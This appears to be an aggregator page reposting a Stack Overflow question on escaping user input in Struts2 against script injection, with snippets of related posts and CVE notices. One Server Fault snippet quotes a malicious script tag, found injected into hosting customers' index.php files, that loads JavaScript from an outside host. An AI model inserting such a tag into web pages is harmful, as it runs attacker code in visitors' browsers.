Lack of example escaping special characters in struts2

Posted by Dewfy on Stack Overflow See other posts from Stack Overflow or by Dewfy
Published on 2010-04-15T09:59:45Z Indexed on 2010/04/15 10:03 UTC
Read the original article Hit count: 378

Filed under:

struts2

|

code-injection

|

escaping

Hello colleagues!

Googling today I couldn't found sample or mentioning of best practice: how to escape user input in Struts2. Of course I can manually convert characters on validate() method, but it looks too obvious. So may be exists some automation to avoid code/script injection?

© Stack Overflow or respective owner

Related posts about struts2

Struts2 - How to use the Struts2 Annotations?

as seen on Stack Overflow - Search for 'Stack Overflow'
I'm trying to implement the Struts 2 Annotations in my project, but I don't know how. I added the convention-plugin v 2.1.8.1 to my pom I modified the web.xml ... <init-param> <param-name>actionPackages</param-name> <param-value>org.apache.struts.helloworld.action</param-value> … >>> More
File upload and Download in a web app using struts2

as seen on Stack Overflow - Search for 'Stack Overflow'
Hi In struts2 upload methods, can I choose where the uploaded file must be saved. I mean, all the examples in web ask me to store in WEB-INF which surely is not a good idea. I want to be able to store the uploaded file in any place in my disk. How should i do it? Can i do it with help of ServletContextAware… >>> More
Struts2 + Sitemesh + Freemarker doesn't work

as seen on Stack Overflow - Search for 'Stack Overflow'
I've tried following every example i ccould find and i can't get struts2 + sitemesh + freemarker to work on a simple jsp. I have a very simple web.xml, a single action that just goes to index.jsp, and a simple .ftl decorator that just adds some text to the result. When i hit index.action, the page… >>> More
Testing injected dependencies into your struts2 actions

as seen on Stack Overflow - Search for 'Stack Overflow'
Hi, I am wondering how others might have accomplished this. I found in the Spring documentation @required which I attempted to use in a 'test' but got this stmt INFO XmlConfigurationProvider:380 - Unable to verify action class [xxx] exists at initialization I have found another way in spring to… >>> More
Struts2 example, not inserting records in mysql database because connection object is getting null

as seen on Stack Overflow - Search for 'Stack Overflow'
This Code is working fine with simple application so the drivers are fine. so why the connection object is not able to initialise with drivers. import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.Statement; import com.opensymphony.xwork2.ActionSupport; public… >>> More

Related posts about code-injection

CVE-2012-6329 Code Injection vulnerability in Perl

as seen on Oracle Blogs - Search for 'Oracle Blogs'
CVE DescriptionCVSSv2 Base ScoreComponentProduct and Resolution CVE-2012-6329 Code Injection vulnerability 7.5 Perl 5.12 Solaris 11.1 11.1.7.5.0 This notification describes vulnerabilities fixed in third-party components that are included in Oracle's product distributions.Information about vulnerabilities… >>> More
CVE-2012-6329 Code Injection vulnerability in Perl 5.8

as seen on Oracle Blogs - Search for 'Oracle Blogs'
CVE DescriptionCVSSv2 Base ScoreComponentProduct and Resolution CVE-2012-6329 Code Injection vulnerability 7.5 Perl 5.8 Solaris 11.1 11.1.7.5.0 Solaris 10 Patches planned but not yet available This notification describes vulnerabilities fixed in third-party components that are included in Oracle's… >>> More
CVE-2010-2761 Code Injection Vulnerability in Perl

as seen on Oracle Blogs - Search for 'Oracle Blogs'
CVE DescriptionCVSSv2 Base ScoreComponentProduct and Resolution CVE-2010-2761 Improper Control of Generation of Code ('Code Injection') vulnerability 4.3 Perl Solaris 9 Contact Support Solaris 10 SPARC : 146032-05 x86 : 146033-05 This notification describes vulnerabilities fixed… >>> More
Information about recent code injection from http://superiot.ru

as seen on Server Fault - Search for 'Server Fault'
Hello, I manage the hosting for a few dozen websites. Since about a week I've been finding this code in 12 different websites in theindex.php files: <script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs <!-- some… >>> More
Debugging site written mainly in JScript with AJAX code injection

as seen on Stack Overflow - Search for 'Stack Overflow'
Hello, I have a legacy code to maintain and while trying to understand the logic behind the code, I have run into lots of annoying issues. The application is written mainly in Java Script, with extensive usage of jQuery + different plugins, especially Accordion. It creates a wizard-like flow, where… >>> More